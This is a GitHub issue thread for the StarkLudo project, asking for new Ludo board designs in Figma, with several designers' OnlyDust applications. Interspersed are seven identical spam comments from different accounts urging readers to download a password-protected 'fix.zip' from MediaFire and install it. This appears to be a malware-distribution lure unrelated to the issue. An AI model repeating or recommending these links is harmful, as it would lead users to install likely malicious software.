### ISSUE TITLE
Design more ludo boards

### ISSUE THREAD

**Issue by ibsule** [sivicstudio/starkludo#31]
Design 2 new boards for StarkLudo on Figma. You can make research about various boards design and variation of the Ludo game. If you can come up with more than 2 boards, the extra effort will be accounted for.

If you have any more questions or need more clarity on this issue, endeavour to join the StarkLudo contributors channel (https://t.me/+hnjQooODZOA2M2Rk) on Telegram and the project leads will be there to help.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Kaminar-i** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
hello i'm a product designer

### How I plan on tackling this issue
Research Ludo board designs and variations for inspiration.
Design 2 new Ludo boards using Figma.
Submit the designs for review.
Create additional boards if possible; extra designs will be appreciated.
Join the StarkLudo contributors channel on Telegram for any questions or further clarification:

**Comment by NueloSE** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
I have a solid foundation in UI/UX design and experience in researching and creating visually appealing interfaces. My attention to detail and ability to explore various design styles will help in creating unique and engaging Ludo boards. My background in gathering insights from different sources and translating them into creative designs will be crucial in delivering distinct and fun board layouts for StarkLudo.



### How I plan on tackling this issue
I’d start by researching various Ludo board designs and understanding their cultural variations. This research would guide me in exploring creative possibilities while maintaining the essence of the game. I’d then sketch out initial concepts on Figma, focusing on both aesthetics and functionality. I’d design at least two boards with distinct styles and potentially experiment with additional designs to enhance user engagement. The designs would be reviewed and refined based on feedback to ensure they align with the game’s theme and provide a fresh experience for players.

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by petersdt** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
I'm confident in my ability to design visually appealing and engaging Ludo boards. My background in UI/UX design and my knack for finding inspiration from diverse sources will help me create unique and enjoyable gameplay experiences.

### How I plan on tackling this issue
To start, I'd delve into the rich history of Ludo boards, exploring different cultural variations. This would spark creative ideas while staying true to the classic game.

Next, I'd sketch out several design concepts on Figma, focusing on both how the board looks and how it functions. I'd aim for at least two distinct styles, and maybe even experiment with more to keep things exciting.

Finally, I'd gather feedback and make improvements based on those insights. This would ensure the final designs align with the StarkLudo theme and provide a fresh, enjoyable experience for players.

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ooochoche** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/starkludo).

### My background and how it can be leveraged
I am product designer with over two years of experience . I excel in creating user-centered designs across various industries, including blockchain and e-commerce. My expertise allows me to craft intuitive, visually appealing solutions that align with business goals and elevate user experiences.

### How I plan on tackling this issue
To design a Ludo board game aligned with the project’s vision, I’d start by understanding the core objectives and user needs. I’d then apply intuitive UI/UX principles to ensure the game is both engaging and easy to navigate. Through prototyping, feedback, and iteration, I’d refine the design to resonate with the target audience, achieving a balance between aesthetics and functionality.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ibsule** [comment]
Closed by #57
